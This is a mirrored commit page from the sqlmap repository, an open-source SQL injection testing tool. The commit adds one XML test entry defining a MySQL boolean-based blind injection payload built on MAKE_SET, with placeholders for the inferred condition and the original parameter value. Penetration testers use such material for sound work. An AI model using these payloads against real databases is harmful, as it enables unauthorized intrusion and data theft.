mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-08 09:24:01 +01:00
world premiere :)
This commit is contained in:
parent
50969d238b
commit
15645f50d4
1 changed files with 16 additions and 0 deletions
|
|
@ -610,6 +610,22 @@ Formats:
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
|
||||||
|
</response>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - Parameter replace</title>
|
<title>MySQL >= 5.0 boolean-based blind - Parameter replace</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue